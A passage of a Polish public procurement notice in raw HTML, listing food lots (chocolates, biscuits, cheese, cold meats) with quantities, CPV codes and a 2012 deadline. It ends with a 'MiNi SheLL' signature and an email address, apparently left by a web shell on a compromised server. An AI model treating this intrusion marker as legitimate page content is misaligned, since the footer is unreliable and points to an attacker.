6. bombonierka czekoladowa Ferrero Rocher lub równoważna	20g	na zewnątrz warstwa czekolady z kawałkami orzecha a pod nią jasnobrązowy wafel w kształcie kuli, orzech laskowy zatopiony w ciemnym kremie	paczka lub karton lub pudełko	80 szt
7. ciastka wielozbożowe Lu Go lub równoważne	300g	ciastka wielozbożowe	paczka lu  karton	240 szt
8. ciastka deserowe z cukrem San Lakotki lub równoważne	148g	ciastka kruche z cukrem	paczka lub karton	200 szt
9. ciasteczka z kawałkami czekolady i bakaliami Pieguski lub równoważne	135g kruche ciasteczka z kawałkami czekolady, rodzynków, orzech w i kokosu. paczka lub karton	250 szt
10.cukierki krówki Goplana lub równoważne	130g	mleczne krówki z nadziniem toffi	paczka lub karton	290 szt
11. herbatniki maślane herbatniki Krakuski maślane lub równoważne	200g	maślane ciasteczka	paczka lub karton	230 szt
12. ciasteczka z bakaliami, orzechami, chrupkami ryżowymi i karmelem w czekoladzie
Jeżyki - Jutrzenka lub równoważne	140g	Ciastka z orzechami laskowymi, karmelem i chrupkami ryżowymi, oblane mleczną czekoladą. W trzech różnych rodzajach. paczka lub karton	200 szt
13. draże w mlecznej czekoladzie Jutrzenka lub równoważne	80g migdały w czekoladzie - 70 szt.
wiśnie w czekoladzie -70 szt
orzechy laskowe w czekoladzie - 60 szt.	paczka lub karton	200
14. cukierki  trufle cukierki Wawel trufle w czekoladzie lub równoważne	30g	cukierki w czekoladzie deserowej o smaku rumowym	paczka lub karton	135 szt
15. cukierki w czekoladzie z orzechowym nadzieniem cukierki Michałki zamkowe Wawel lub równoważne	280g	cukierki w czekoladzie z orzechowym nadzieniem	paczka lub karton	150 szt
16. ciastka z galaretką i biszkoptem w czekoladzie Wedel - delicje szampańskie lub równoważne	147g	galaretka i biszkopt w czekoladzie paczka lub karton 230 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DOSTAWA SERA ŻÓŁTEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ser żółty Mlekpol Królewski z Kolna lub równoważny 0,15 kg w plastrach, hermetycznie pakowany 40 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.54.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> DOSTAWA WĘDLIN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szynka wieprzowa gotowana Morliny lub równoważna	0,15 kg	w plastrach	hermetyczne	55 szt
2. Szynka wieprzowa Morliny lub równoważna	0,15 kg	w plastrach	hermetyczne	55 szt
3. Kiełbasa salami Morliny salami ostródzkie	100g	w plastrach	hermetyczne	55 szt
4. Kiełbasa sucha krakowska sucha Krakus lub równoważna	320g	w całości	hermetyczne	40 szt.
5. Kabanosy Krakus lub równoważne	180g	w całości	hermetyczne	40 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com